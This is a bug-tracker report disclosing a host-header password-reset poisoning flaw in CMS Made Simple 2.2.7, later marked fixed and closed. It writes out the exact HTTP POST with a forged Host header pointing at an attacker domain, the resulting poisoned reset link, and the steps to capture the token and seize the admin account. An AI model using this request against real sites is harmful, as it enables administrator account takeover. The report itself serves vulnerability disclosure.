CMS MADE SIMPLE FORGE

CMS Made Simple Core

 

[#11762] Administrator Password Reset Poisoning by host header attack

avatar
Created By: reklawetihwx (reklawetihwx)
Date Submitted: Sat Mar 03 05:58:34 -0500 2018

Assigned To:
Version: None
CMSMS Version: 2.2.7
Severity: Minor
Resolution: Fixed
State: Closed
Summary:
Administrator Password Reset Poisoning by host header attack
Detailed Description:
the forget password function only needs the user name to generate the reset
password link to the user'email.The following POST request is the normal
request.

POST /admin/login.php HTTP/1.1
Host: Host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/admin/login.php?forgotpw=1
Cookie: [removed]
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

forgottenusername=admin&forgotpwform=1&loginsubmit=Submit

This is the a normal reset password link:

http://Host/admin/login.php?recoverme=b18c6cc54432d97a1a7f28c6103b5b58

But the reset password link's host is come from the forget password POST
request. It means that if we change the host header of the request, the reset
password link's host will be change.

so if the attacker konws the administrator'name and change the change the host
header of the request. when the admin click the link, the attacker will be know
the token of recoverme. For example:
1. the attcker change the host header of the request to his dns server which is
evil.dnsserver.com

POST /admin/login.php HTTP/1.1
Host: evil.dnsserver.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/admin/login.php?forgotpw=1
Cookie: [removed]
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

forgottenusername=admin&forgotpwform=1&loginsubmit=Submit

2. then the admin will receive the password reset link as follow:

http://evil.dnsserver.com/admin/login.php?recoverme=b18c6cc54432d97a1a7f28c6103b5b58

3. when the admin click the reset password link, the attacker will receive the
request from the admin, and the attacker will get the value of recoverme. Then
the attacker can make up a true reset password link with the true host and can
change the admin's password


History

Comments
avatar
Date: 2018-03-14 03:08
Posted By: reklawetihwx (reklawetihwx)

Any news about this ?
      
Updates

Updated: 2018-08-25 10:26
state: Open => Closed

Updated: 2018-07-14 18:32
resolution_id: 5 => 7

Updated: 2018-03-25 07:34
resolution_id: => 5
cmsms_version_id: 31359 => 31369